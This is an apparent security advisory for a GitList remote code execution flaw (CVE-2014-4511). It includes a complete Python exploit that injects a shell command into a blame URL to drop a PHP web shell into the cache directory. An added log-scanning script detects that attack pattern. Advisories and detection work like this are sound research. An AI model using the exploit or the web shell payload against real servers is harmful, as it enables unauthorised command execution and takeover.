GitList Remote Code Execution Vulnerability (CVE-2014-4511)

2019-02-14 11:20:26 | Author: 辰钊 | Tags: code, vulnerability, vendor

Affected systems:
GitList GitList < 0.4.0
 GitList GitList
Description:

BUGTRAQ  ID: 68253
 CVE(CAN) ID: CVE-2014-4511
 
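GitList is an open-source Git repository browser written in PHP.
 
GitList versions before 0.4.0 contain a remote code execution vulnerability in their implementation; a remote attacker can exploit it to execute arbitrary code.
 
<*Source: drone
  *>
Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!


The code is as follows: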
# Python 2 script (uses the commands module and print statements)
from commands import getoutput
import urllib
import sys

"""
Exploit Title: Gitlist <= 0.4.0 anonymous RCE
Date: 06/20/2014
Author: drone (@dronesec)
Vendor Homepage: https://gitlist.org/
Software link: https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz
Version: <= 0.4.0
Fixed in: 0.5.0
Tested on: Debian 7
More information: https://hatriot.github.io/blog/2014/06/29/gitlist-rce/
cve: CVE-2014-4511
"""

if len(sys.argv) <= 1:
    print '%s: [url to git repo] {cache path}' % sys.argv[0]
    print 'Example: python %s https://localhost/gitlist/my_repo.git' % sys.argv[0]
    print 'Example: python %s https://localhost/gitlist/my_repo.git /var/www/git/cache' % sys.argv[0]
    sys.exit(1)

url = sys.argv[1]
url = url if url[-1] != '/' else url[:-1]

path = "/var/www/gitlist/cache"
if len(sys.argv) > 2:
    path = sys.argv[2]

print '[!] Using cache location %s' % path

# payload <?system($_GET['cmd']);?>
payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo="

# sploit; python requests does not like this URL, hence wget is used
mpath = '/blame/master/""`echo {0}|base64 -d > {1}/x.php`'.format(payload, path)
mpath = url + urllib.quote(mpath)

out = getoutput("wget %s" % mpath)
if '500' in out:
    print '[!] Shell dropped; go hit %s/cache/x.php?cmd=ls' % url.rsplit('/', 1)[0]
else:
    print '[-] Failed to drop'
    print out

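Recommendation:

Vendor patch:
 
GitList
 -
 The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page: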
 
https://gitlist.org/
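
Detection check for the request pattern used by the test method above (an added example, not part of the original advisory, the exploit author's code or the GitList project). It flags access-log entries whose decoded /blame/ path contains shell command substitution, and requests for a PHP file under a cache directory. It generalizes from the backticks in the test method to the $( form as well; the combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Request line and status inside an Apache/nginx "combined" access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# Shell command substitution never belongs in a branch or file name.
SUBSTITUTION_RE = re.compile(r"`|\$\(")
# A PHP script requested from a cache directory (where x.php is written above).
CACHE_PHP_RE = re.compile(r"/cache/[^/]+\.php$")

# Constructed sample lines (documentation addresses, placeholder command text).
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Jun/2014:10:00:00 +0000] "GET /gitlist/my_repo.git/blame/master/README.md HTTP/1.1" 200 5120',
    '203.0.113.9 - - [20/Jun/2014:10:01:00 +0000] "GET /gitlist/my_repo.git/blame/master/%22%22%60CONSTRUCTED%60 HTTP/1.1" 500 1024',
    '203.0.113.9 - - [20/Jun/2014:10:01:05 +0000] "GET /gitlist/cache/x.php?cmd=ls HTTP/1.1" 200 312',
    '203.0.113.7 - - [20/Jun/2014:10:02:00 +0000] "GET /gitlist/my_repo.git/blame/master/$(CONSTRUCTED) HTTP/1.1" 404 210',
]


def classify(line):
    """Return a finding label for one access-log line, or None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    target, status = match.group(1), match.group(2)
    # Decode percent-escapes: urllib.quote() in the test method hides the backticks.
    path = unquote(urlsplit(target).path)
    if "/blame/" in path and SUBSTITUTION_RE.search(path):
        # The test method treats an HTTP 500 response as a successful drop.
        return "blame-injection-500" if status == "500" else "blame-injection"
    if CACHE_PHP_RE.search(path):
        return "php-in-cache"
    return None


def scan(lines):
    """Return (line_number, label) for every suspicious line."""
    findings = []
    for number, line in enumerate(lines, 1):
        label = classify(line)
        if label:
            findings.append((number, label))
    return findings


if __name__ == "__main__":
    for number, label in scan(SAMPLE_LOG):
        print("line %d: %s" % (number, label))
```

A blame-injection-500 finding followed by a php-in-cache finding from the same client is the sequence the test method produces and warrants checking the cache directory for unexpected .php files.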
